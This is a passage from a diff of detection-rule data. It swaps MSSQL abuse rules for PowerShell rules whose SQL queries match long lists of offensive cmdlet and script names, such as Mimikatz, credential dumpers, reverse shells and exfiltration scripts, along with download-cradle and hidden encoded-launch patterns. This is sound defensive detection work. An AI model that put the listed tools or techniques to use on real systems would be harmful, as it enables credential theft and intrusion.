'%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE 